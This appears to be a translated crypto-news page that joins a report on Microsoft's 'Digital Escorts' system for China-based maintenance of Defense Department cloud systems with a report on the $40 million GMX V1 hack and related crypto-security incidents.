Microsoft was exposed on 7/15 for maintaining the U.S. Department of Defense computer systems through Chinese engineers over the past decade, with only limited-capability "Digital Escorts" executing commands, potentially allowing Chinese hackers to exploit vulnerabilities. After the news broke, U.S. Secretary of Defense Pete Hegseth stated that a two-week investigation has been launched.
Table of Contents
ToggleThe "Digital Escorts" System Exposed After a Decade, Unknown Even to the Defense Department
The system originated a decade ago when Microsoft proposed a "compromise solution" to secure U.S. government cloud contracts, allowing overseas engineers from China to maintain technical aspects, with U.S. personnel holding Defense Department security clearance inputting commands, known as "Digital Escorts".
Microsoft commissioned outsourcing companies Insight Global and ASM Research to recruit escorts, mostly veterans or those with security clearance, starting at $18 per hour, with limited technical capabilities unable to identify malicious programs. A current escort revealed:
"We process hundreds of requests from Chinese engineers monthly, trying to prevent data 'leakage', but technical training cannot bridge the gap. Even if suspicious commands are discovered, it's practically impossible to detect afterwards, we can only trust these engineers haven't done anything wrong."
This system has been operating for years, extremely low-profile, with the Defense Information Systems Agency (DISA) stating "no one knows about this".
Chinese Hacker Threats Continue Unabated, Experts Say It's More Dangerous Than TikTok
The Office of the Director of National Intelligence (ODNI) has consistently viewed China as the most active source of hacker threats. In 2023, Chinese hackers even infiltrated high-level government cloud email accounts, stealing 60,000 State Department emails.
Former CIA and NSA high-ranking official Harry Coker, upon seeing the escort system, directly stated:
"If I were a Chinese intelligence officer, this would be an absolutely perfect infiltration opportunity."
He emphasized that this is far more serious than TikTok or espionage concerns about Chinese students. Former Defense Department CIO John Sherman was also surprised, stating:
"I should have known about this. DISA and the U.S. Cyber Command should review this."
Experts warn that under Chinese law, the government can request data from enterprises or citizens if deemed for "legitimate purposes". In other words, Microsoft employees in China could be compelled to cooperate with intelligence units, rendering the escort system ineffective.
How Do the Escorts Operate?
Here's the "Digital Escorts" operational process:
Chinese Engineers Submit Maintenance Requests: Microsoft engineers from China submit request documents, such as firewall repairs or system log checks.
U.S. Digital Escorts Receive Requests: Domestic escorts meet with Chinese engineers to discuss.
Escorts Copy Commands: Chinese engineers provide computer instructions, which escorts directly input into the Defense Department cloud system.
Escorts Cannot Distinguish Code Content: If a script named "fix_servers.sh" is actually malicious, escorts lack the ability to identify it.
A Microsoft engineer involved in the system's design, Matthew Erickson, candidly admitted that escorts have only minimal technical understanding, with actual maintenance still performed by overseas engineers, and escorts merely ensuring overseas engineers cannot see passwords or personal information.
Why Does Such a System Exist?
The U.S. Department of Defense requires individuals handling sensitive data to be U.S. citizens or green card holders. However, Microsoft's team is global, with numerous engineers in China, India, and Europe, and temporarily hiring many U.S. engineers would be prohibitively expensive.
Here's the English translation: When Microsoft's "FedRAMP lobbyist" Indy Crowley lobbied the government, he claimed that cloud maintenance risks were no greater than those of other government suppliers. The Department of Defense had once suggested directly hiring American engineers, but Crowley refused, as the cost would make government cloud transformation prohibitively expensive. Ultimately, Microsoft adopted a guardian system as the most cost-effective and effortless solution that could satisfy Department of Defense regulations without spending a fortune. (Note: Federal Risk and Authorization Management Program (FedRAMP) is a standardized program implemented by the US federal government to provide a unified security assessment, authorization, and continuous monitoring mechanism for cloud products and services adopted by government agencies, ensuring these cloud services comply with security standards.) Internal Personnel Had Warned, But Were Ignored by Senior Management There were actually internal opponents at Microsoft who believed the security risks were too high, but Tom Keane, the cloud platform director at the time, strongly promoted the system because it could quickly expand business. Those who initially opposed it eventually left, and the guardian system was implemented. Subsequently, Microsoft's security managers repeatedly warned that the guardian system had vulnerabilities, with overseas engineers able to access US federal cloud details, and guardians unable to detect issues, but these warnings did not change the company's decisions. Microsoft Claims No Longer Using Chinese Engineers to Support Defense Systems After the controversy was exposed, Microsoft claimed that Chinese engineers under the company do not "directly touch defense systems", only providing instructions, and that guardians have comprehensive technical training and monitoring, emphasizing an internal "Lockbox" review process, though details remain undisclosed. Microsoft President Brad Smith mentioned in a May Senate hearing that the company is "removing Chinese nationals from government institutions" without explaining how they initially entered these systems. Microsoft spokesperson Frank Shaw also stated on X (Twitter) on 7/19: "No Chinese engineers will provide technical assistance for US Defense cloud and related services." US Secretary of Defense Pete Hegseth also commented on X (Twitter) on 7/19: "A two-week investigation will be launched to ensure Chinese engineers are completely withdrawn from Department of Defense cloud services, no longer allowing Chinese nationals to participate, and continuing to monitor and counter military infrastructure and network threats." Risk Warning Cryptocurrency investment carries high risks, and prices may fluctuate dramatically. You may lose all your principal. Please carefully assess the risks. Decentralized perpetual contract exchange (Perp DEX) GMX reported a security incident yesterday, with its early version GMX V1 being hacked, resulting in a loss of $40 million. The GMX development team stated that V2 and primary tokens were not affected, though community confidence may have been severely damaged. GLP Price Algorithm Exploited, Hackers Steal $40 Million in Assets GMX officially announced yesterday that due to an attack on its GLP asset pool, it has emergency suspended all trading operations on GMX V1 and completely halted GLP token minting and redemption on Arbitrum and Avalanche networks. GLP is GMX's liquidity token, backed by assets including Bitcoin, Ethereum, and stablecoins. According to on-chain security company SlowMist's analysis, the attack originated from a design vulnerability in GLP pricing logic, with hackers manipulating Assets Under Management (AUM) to steal funds. The GMX team emphasized that the incident only affects V1 version, with V2, overall market mechanisms, and primary token GMX remaining unaffected. However, the team urged all users to immediately close leverage functions and GLP minting to prevent potential risk expansion. Currently, the team offers a 10% bounty as a white hat reward, but the attacker seems uninterested.Infini co-founder also lamented: "More heartbreaking than the fall of this generation's Perp DEX giant is that he was stolen so much money, and the Chinese-speaking community still doesn't pay much attention to him."
A hero does not suddenly die; he just gradually disappears into the historical torrent and people's memories.
Crypto Hacking Losses Reach $2.5 Billion in 2025
GMX is not an isolated case. A report from Chainalysis a few days ago pointed out that in the first half of this year, the global crypto industry has accumulated losses of $2.5 billion due to security incidents, with the Bybit hack of $1.4 billion being the most significant, becoming the most devastating attack since the beginning of the year.
On the other hand, a few weeks ago, Iran's largest crypto exchange Nobitex was also invaded by the pro-Israel hacker group Gonjeshke Darande, losing over $81 million, highlighting that neither centralized nor decentralized platforms are immune to hackers.
From Security Vulnerabilities to National Security Frontlines: North Korean Hackers Become a Global Crisis
Amid frequent attacks, the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) also announced a new round of sanctions against the North Korean hacker group Andariel this week. Named member Song Kum Hyok is suspected of attacking multiple crypto companies and defense enterprises through social engineering and network infiltration, attempting to penetrate internally and steal core technologies and assets.
U.S. authorities stated: "These hacker groups are highly linked to the North Korean regime, with the purpose of using digital assets and crypto trading networks to evade cross-national sanctions, conduct espionage infiltration, and money laundering operations."
The GMX V1 attack once again proves that DeFi protocols not only need sophisticated economic models but also robust defense mechanisms and continuous risk testing. As global hacker methods continue to evolve and even combine with national regimes, the crypto field will face even more severe cybersecurity challenges in the future.
Risk Warning
Cryptocurrency investment carries high risks, and its price may fluctuate dramatically. You may lose all your principal. Please carefully assess the risks.
